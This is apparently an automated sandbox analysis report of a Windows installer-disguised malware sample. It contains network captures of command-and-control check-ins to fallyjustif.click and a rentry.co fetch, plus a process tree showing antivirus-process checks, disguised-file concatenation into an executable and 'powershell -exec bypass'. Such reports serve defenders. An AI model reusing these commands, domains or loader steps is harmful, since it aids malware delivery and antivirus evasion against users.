                                                            Data Ascii: U M-4#o)?ra9:BcT"s?tPB-]m+&d]Lq-^lcDY&ST^I58r48?#y>,*ci6G>#X)?cbD`NmIY4C+qEiE|r7p;Nmvp[M~ykp"!AOMU@EuZg
                                                            2024-12-28 20:36:10 UTC15331OUTData Raw: 11 75 30 89 e6 f9 64 bd 8b 13 3b 8d ac c9 7f 7c cf a1 f0 81 f0 67 24 ec f9 94 1a 51 8b 44 94 ca b1 08 16 ac 0b 25 50 87 bc 25 1d db 1b 6c b1 64 b3 d7 78 3b 96 c8 89 45 86 ce 8c 14 3c 95 cf 61 be fc 3e 30 67 79 5e 21 42 3d cc a6 43 be 00 79 66 f3 ad 97 48 1f 2f 67 9d cb 98 ad 8f 43 03 c3 43 96 44 9d 6f 9e 89 6b 1a 4a 1e 65 ec be 01 48 a7 70 0e 84 0c 63 88 79 88 d6 f9 e1 0e 2a bc bc 36 42 c9 cd e0 97 f8 6c eb 5a e0 56 f1 75 a7 c5 4d ba 9c 2c e4 d8 11 dc a2 7b 96 fe 9d 08 58 20 05 ea 80 eb 49 4e a7 50 21 83 77 58 9f 46 0f 09 58 7e 9e b0 50 ea f4 21 a4 ec 47 90 a7 74 64 0f d0 fe c1 d3 e0 0c 9b 54 9c 15 87 d6 c4 28 cc 52 d5 3d fe 43 8f f0 e3 78 a1 f7 34 c2 7b 44 04 72 9b 69 7f f4 7a 89 17 a0 c8 85 d0 84 a8 c2 42 77 e5 9c 29 a6 7b b9 5a b3 ad 2b 1b 65 7b 7d 48
                                                            Data Ascii: u0d;|g$QD%P%ldx;E<a>0gy^!B=CyfH/gCCDokJeHpcy*6BlZVuM,{X INP!wXFX~P!GtdT(R=Cx4{DrizBw){Z+e{}H
                                                            2024-12-28 20:36:10 UTC15331OUTData Raw: 8b ba 98 f2 6a 55 35 1f 8b 8b 2a 1c d4 e5 37 8a 76 14 47 6a b0 08 b1 00 0e 5e 9b 8d 34 ed 45 36 6b 88 6d 06 82 af 60 32 3d 2f 56 a3 3d 7f a0 14 51 be 63 26 c7 61 d2 82 59 57 eb 5c b2 56 1c eb 95 3d a7 88 60 1a ab 57 bc ec dc 37 ca bb 3a d9 21 1f 42 ba 82 c1 62 5b 7e 65 b4 38 2b 09 b7 0f 49 9e 93 b0 c4 10 55 82 cf f2 5d 54 e8 e1 61 bd 56 db 3b 3b 45 1b 99 26 66 a8 a4 c2 19 2d c9 c9 6f 80 76 49 86 c8 d2 c6 d4 1f 5c ae e8 70 f7 cf 0d 30 ed 3c 0e b0 99 75 a3 b7 6b 36 0d 12 3a 3c c5 f1 23 e2 42 0a d8 bf 06 70 5a ca c2 73 60 ef 5a 22 10 28 3c 10 6f 5b e3 26 be f2 11 df f0 6d 78 84 65 b5 c4 ad b7 80 48 55 55 53 6d 17 c6 df 4e a5 35 f5 8f 8e da 3b 68 8c 21 1b 0a 88 b8 89 42 95 9b 31 b8 f8 2a 1f af a9 76 85 7d 6f 5b ed 5f a6 e5 78 11 dc 14 e4 f4 b1 2a 35 5e 03 c8
                                                            Data Ascii: jU5*7vGj^4E6km`2=/V=Qc&aYW\V=`W7:!Bb[~e8+IU]TaV;;E&f-ovI\p0<uk6:<#BpZs`Z"(<o[&mxeHUUSmN5;h!B1*v}o[_x*5^
                                                            2024-12-28 20:36:12 UTC1131INHTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=5kn67vofkh6ovimgcbcpknpij2; expires=Wed, 23 Apr 2025 14:22:51 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aMyEeA1SBZjLZBaKCHpt6RNwDZVwohhyE3iwCcZVona0S4pYgB4WNFESIWw4NYB6DOamPN6IxZLKpGTXwN9hP3y3hglsAbnV7vNOr6iGpNb9hWkNOcOm662ngh9PoFQlwbIoRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f94574edcd08c6c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1883&min_rtt=1848&rtt_var=718&sent=332&recv=612&lost=0&retrans=0&sent_bytes=2841&recv_bytes=590407&delivery_rate=1580086&cwnd=168&unsent_bytes=0&cid=8443bb300c309502&ts=1909&x=0"


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549831172.67.213.1154436460C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-28 20:36:13 UTC265OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 84
                                                            Host: fallyjustif.click
                                                            2024-12-28 20:36:13 UTC84OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 26 6a 3d 26 68 77 69 64 3d 31 42 37 37 31 34 32 45 33 38 37 45 39 30 37 32 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41
                                                            Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl1new1&j=&hwid=1B77142E387E90721441EDD8E05CE3DA
                                                            2024-12-28 20:36:14 UTC1129INHTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=2frptjehdmqhi361pc9hlhljhk; expires=Wed, 23 Apr 2025 14:22:53 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nNrDK9kVgYJOWueoLLpulzFUe87%2FYLVl8cJAFa7f8fdKGENQvTYFc9Fe1NY9LUg0ME0yomejX8mybRnEYB4zdKzXV1rX5VH1DiL5xCNaItP6ERefrcKP%2F8kYZ8miAj8Sp%2BkIQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f945762ec977293-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1803&rtt_var=691&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=985&delivery_rate=1567364&cwnd=158&unsent_bytes=0&cid=477a27922ed83265&ts=789&x=0"
                                                            2024-12-28 20:36:14 UTC126INData Raw: 37 38 0d 0a 68 56 4f 49 78 51 58 51 79 4e 54 73 6c 49 6b 78 58 58 6d 45 51 49 52 77 77 77 4d 51 37 71 4f 44 47 37 46 59 42 70 46 6a 70 42 66 65 4b 4b 71 77 4a 2b 72 71 76 4a 6a 67 2b 55 4a 6e 4a 61 73 63 71 77 4b 6d 62 57 53 63 32 71 31 34 33 67 51 70 39 77 62 4c 59 75 41 6b 37 66 42 5a 2f 37 71 31 6d 37 61 6c 45 7a 73 4e 70 6e 71 32 58 4f 46 6d 4d 74 53 54 2f 6b 59 3d 0d 0a
                                                            Data Ascii: 78hVOIxQXQyNTslIkxXXmEQIRwwwMQ7qODG7FYBpFjpBfeKKqwJ+rqvJjg+UJnJascqwKmbWSc2q143gQp9wbLYuAk7fBZ/7q1m7alEzsNpnq2XOFmMtST/kY=
                                                            2024-12-28 20:36:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.549836172.67.75.404436460C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-28 20:36:15 UTC196OUTGET /feouewe5/raw HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Host: rentry.co
                                                            2024-12-28 20:36:16 UTC918INHTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:16 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            vary: Origin
                                                            x-xss-protection: 1; mode=block
                                                            x-content-type-options: nosniff
                                                            strict-transport-security: max-age=31536000; includeSubDomains
                                                            Cache-Control: Vary
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5gr%2B5F9RaG79UfgVFTswxD%2Bkc%2Fczbr4CxVmwIQAoejbg2SiSqIptir7AQFa74PYF3oEyVMmYbv36IN5IJJVgKCF7qw55MxPH%2BlRYjQ1CN84YWjX5YftTb2mlQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f945770eee0c34d-EWR
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1706&rtt_var=646&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=810&delivery_rate=1683967&cwnd=252&unsent_bytes=0&cid=14dbbc553ba22a62&ts=816&x=0"
                                                            2024-12-28 20:36:16 UTC451INData Raw: 31 36 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 57 68 61 74 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 77 68 61 74 22 20 2f 3e 0a 0a 20 20 20 20 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 69 73 20 61 20 6d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65
                                                            Data Ascii: 161b<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>What</title><link rel="canonical" href="https://rentry.co/what" /> <meta name="description" content="Rentry.co is a markdown paste service with preview, custom urls and e
                                                            2024-12-28 20:36:16 UTC1369INData Raw: 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67
                                                            Data Ascii: eta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." /><meta name="twitter:title" content="Rentry.co - Markdown Paste Service" /><meta name="twitter:site" content="@rentry_co" /><meta name="twitter:imag
                                                            2024-12-28 20:36:16 UTC1369INData Raw: 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 3d 20 6e 75 6c 6c 20 26 26 20 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 22 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74
                                                            Data Ascii: tem("dark-mode") === null && window.matchMedia("(prefers-color-scheme: dark)").matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rent
                                                            2024-12-28 20:36:16 UTC1369INData Raw: 73 20 61 63 63 65 73 73 20 63 6f 64 65 20 61 73 20 61 20 68 65 61 64 65 72 20 69 6e 20 79 6f 75 72 20 72 65 71 75 65 73 74 2c 20 77 68 69 63 68 20 77 69 6c 6c 20 67 69 76 65 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 61 6e 79 20 70 6f 73 74 27 73 20 2f 72 61 77 2f 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 73 79 73 74 65 6d 20 77 61 73 20 61 20 6e 65 63 65 73 73 61 72 79 20 61 64 64 69 74 69 6f 6e 20 64 75 65 20 74 6f 20 65 78 74 65 6e 73 69 76 65 20 6d 69 73 75 73 65 20 62 79 20 62 61 64 20 61 63 74 6f 72 73 20 70 6f 73 74 69 6e 67 20 6d 61 6c 77 61 72 65 20 73 6e 69 70 70 65 74 73 20 61 6e 64 20 67 65 74 74 69 6e 67 20 75 73 20 69 6e 74 6f 20 61 20 6c 6f 74 20 6f 66 20 74 72 6f
                                                            Data Ascii: s access code as a header in your request, which will give you access to any post's /raw/ page.</p> <p>This system was a necessary addition due to extensive misuse by bad actors posting malware snippets and getting us into a lot of tro
                                                            2024-12-28 20:36:16 UTC1109INData Raw: 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65
                                                            Data Ascii: ript><script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.create
                                                            2024-12-28 20:36:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:15:35:00
                                                            Start date:28/12/2024
                                                            Path:C:\Users\user\Desktop\!Set-up..exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\!Set-up..exe"
                                                            Imagebase:0x400000
                                                            File size:14'866'519 bytes
                                                            MD5 hash:27968EEBCB115C6ECB62199A98CE9EE6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:15:35:01
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:15:35:01
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:15:35:03
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:tasklist
                                                            Imagebase:0xe80000
                                                            File size:79'360 bytes
                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:15:35:03
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:findstr /I "opssvc wrsa"
                                                            Imagebase:0xeb0000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:15:35:03
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:tasklist
                                                            Imagebase:0xe80000
                                                            File size:79'360 bytes
                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:15:35:03
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                            Imagebase:0xeb0000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:15:35:04
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c md 71992
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:15:35:04
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\extrac32.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:extrac32 /Y /E Ec
                                                            Imagebase:0x8d0000
                                                            File size:29'184 bytes
                                                            MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:15:35:05
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:findstr /V "Ratio" Returning
                                                            Imagebase:0xeb0000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:15:35:05
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:15:35:05
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:15:35:05
                                                            Start date:28/12/2024
                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            Wow64 process (32bit):true
                                                            Commandline:Banned.com V
                                                            Imagebase:0x6b0000
                                                            File size:947'288 bytes
                                                            MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 0%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:15:35:05
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:choice /d y /t 5
                                                            Imagebase:0xa10000
                                                            File size:28'160 bytes
                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:15:36:15
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1"
                                                            Imagebase:0x700000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:15:36:16
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:18.6%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:20.9%
                                                              Total number of Nodes:1481
                                                              Total number of Limit Nodes:26
                                                              execution_graph 4200 402fc0 4201 401446 18 API calls 4200->4201 4202 402fc7 4201->4202 4203 401a13 4202->4203 4204 403017 4202->4204 4205 40300a 4202->4205 4207 406831 18 API calls 4204->4207 4206 401446 18 API calls 4205->4206 4206->4203 4207->4203 4208 4023c1 4209 40145c 18 API calls 4208->4209 4210 4023c8 4209->4210 4213 407296 4210->4213 4216 406efe CreateFileW 4213->4216 4217 406f30 4216->4217 4218 406f4a ReadFile 4216->4218 4219 4062cf 11 API calls 4217->4219 4220 4023d6 4218->4220 4223 406fb0 4218->4223 4219->4220 4221 406fc7 ReadFile lstrcpynA lstrcmpA 4221->4223 4224 40700e SetFilePointer ReadFile 4221->4224 4222 40720f CloseHandle 4222->4220 4223->4220 4223->4221 4223->4222 4225 407009 4223->4225 4224->4222 4226 4070d4 ReadFile 4224->4226 4225->4222 4227 407164 4226->4227 4227->4225 4227->4226 4228 40718b SetFilePointer GlobalAlloc ReadFile 4227->4228 4229 4071eb lstrcpynW GlobalFree 4228->4229 4230 4071cf 4228->4230 4229->4222 4230->4229 4230->4230 4231 401cc3 4232 40145c 18 API calls 4231->4232 4233 401cca lstrlenW 4232->4233 4234 4030dc 4233->4234 4235 4030e3 4234->4235 4237 405f7d wsprintfW 4234->4237 4237->4235 4238 401c46 4239 40145c 18 API calls 4238->4239 4240 401c4c 4239->4240 4241 4062cf 11 API calls 4240->4241 4242 401c59 4241->4242 4243 406cc7 81 API calls 4242->4243 4244 401c64 4243->4244 4245 403049 4246 401446 18 API calls 4245->4246 4247 403050 4246->4247 4248 406831 18 API calls 4247->4248 4249 401a13 4247->4249 4248->4249 4250 40204a 4251 401446 18 API calls 4250->4251 4252 402051 IsWindow 4251->4252 4253 4018d3 4252->4253 4254 40324c 4255 403277 4254->4255 4256 40325e SetTimer 4254->4256 4257 4032cc 4255->4257 4258 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4255->4258 4256->4255 4258->4257 4259 4022cc 4260 40145c 18 API calls 4259->4260 4261 4022d3 4260->4261 4262 406301 2 API calls 4261->4262 4263 4022d9 4262->4263 4265 4022e8 4263->4265 4268 405f7d wsprintfW 4263->4268 4266 4030e3 4265->4266 4269 405f7d wsprintfW 4265->4269 4268->4265 4269->4266 4270 4030cf 4271 40145c 18 API calls 4270->4271 4272 4030d6 4271->4272 4274 4030dc 4272->4274 4277 4063d8 GlobalAlloc lstrlenW 4272->4277 4275 4030e3 4274->4275 4304 405f7d wsprintfW 4274->4304 4278 406460 4277->4278 4279 40640e 4277->4279 4278->4274 4280 40643b GetVersionExW 4279->4280 4305 406057 CharUpperW 4279->4305 4280->4278 4281 40646a 4280->4281 4282 406490 LoadLibraryA 4281->4282 4283 406479 4281->4283 4282->4278 4286 4064ae GetProcAddress GetProcAddress GetProcAddress 4282->4286 4283->4278 4285 4065b1 GlobalFree 4283->4285 4287 4065c7 LoadLibraryA 4285->4287 4288 406709 FreeLibrary 4285->4288 4289 406621 4286->4289 4293 4064d6 4286->4293 4287->4278 4291 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4287->4291 4288->4278 4290 